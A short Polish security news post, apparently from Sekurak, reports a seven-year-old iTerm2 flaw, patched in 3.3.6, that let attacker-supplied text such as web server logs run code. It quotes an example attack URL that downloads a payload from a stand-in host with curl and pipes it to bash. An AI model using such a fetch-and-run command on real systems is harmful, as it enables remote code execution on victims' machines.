Wystartowała Akademia NIS2/KSC2! Można jeszcze dołączyć do końca lipca!
Konferencja Mega Sekurak Hacking Party w Krakowie – 26-27 października!
Bezpłatne szkolenie: AI dla admina. Top 5 zadań, które zrobisz szybciej
Wystartowała Akademia NIS2/KSC2! Można jeszcze dołączyć do końca lipca!
Konferencja Mega Sekurak Hacking Party w Krakowie – 26-27 października!
Bezpłatne szkolenie: AI dla admina. Top 5 zadań, które zrobisz szybciej
Dzięki projektowi wspieranemu przez Mozillę wykryto krytyczny błąd w narzędziu iTerm2 – bardzo popularnym w środowiskach wielbicieli komputerów Apple.
O co chodzi? Jeśli używasz iTerma2 np. do odczytania plików, których zawartość dostarczy atakujący, możliwe jest wykonanie kodu w OS z Twoimi uprawnieniami:

Ciekawy przykład podany jest tutaj. Atakujący wchodzi na Twoją stronę, na mniej więcej tego typu URL: /404/escape-code/curl -s http://evil.com/pwn|bash Jak teraz w iTerm-e odczytasz logi z webserwera – whoops – ktoś wykonał na Twoim komputerze złośliwy kod. Inny scenariusz – to np. podłączenie się ofiary przez SSH na odpowiednio zainfekowany serwer.
Błąd występował w iTerm2 przez ostatnie 7 lat i został załatany w wersji 3.3.6 narzędzia.
–ms